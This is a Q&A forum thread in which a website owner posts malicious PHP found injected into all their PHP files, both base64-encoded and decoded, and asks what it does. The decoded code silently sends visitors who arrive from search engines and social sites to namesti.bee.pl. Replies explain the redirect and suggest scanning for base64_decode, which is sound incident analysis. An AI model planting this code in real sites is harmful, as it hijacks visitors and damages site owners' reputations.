# How much i have lost from this malicious code?

Tags: php, malware

This February 14 my website got attacked by some malware code which comes to my notice after google's Action on 29th Feb But All php files have got effected with the malicious code on checking i got the following code

> echo
>   base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9");

on decoding it become

> error_reporting(0); $qazplm = headers_sent(); if (!$qazplm) {
>       $referer = $_SERVER['HTTP_REFERER'];
>       $uag = $_SERVER['HTTP_USER_AGENT'];
>       if ($uag) {
>           if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "gogo") or
>   stristr($referer, "live.com") or stristr($referer, "aport") or
>   stristr($referer, "nigma") or stristr($referer, "webalta") or
>   stristr($referer, "begun.ru") or stristr($referer, "stumbleupon.com")
>   or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or
>   preg_match("/yandex.ru/yandsearch\?(.*?)\&lr\=/", $referer) or
>   preg_match("/google.(.*?)/url/", $referer) or stristr($referer,
>   "myspace.com") or stristr($referer, "facebook.com") or
>   stristr($referer, "aol.com")) {
>               if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
>                   header("Location: http://namesti.bee.pl/");
>                   exit();
>               }
>           }
>       } }

i dont know how it came to my server but All php files have got effected but others are fine.entire web site is down now. i Just want to know how much harm it can do And What this code does exactly. How can i detect it. Is it the script which executes on particular time.

Comment: This code does a 302 redirect to this namesti site if the referrer was a list of search engines and social networking sites.  Effectively a DoS.  Scan all your PHP for `base64_decode`.  However, the main issue is how the hack occurred in the first place.  This is just a std "how do I lock down a PHP site" Q.

Comment: Ahh, the old base 64 attack, it has happened to many, including a friend of mine, but the damage really wasn't too severe as it is done by bots and not humans.

Comment: This link might help http://www.thonky.com/how-to/prevent-base-64-decode-hack/

Answer (score 4, accepted):

The script just attempts to redirect to `namesti.bee.pl` depending on whether headers have already been sent or not, and what the referer string contains.

It doesn't do anything else, so the harm done is on your site's reputation more than anything else.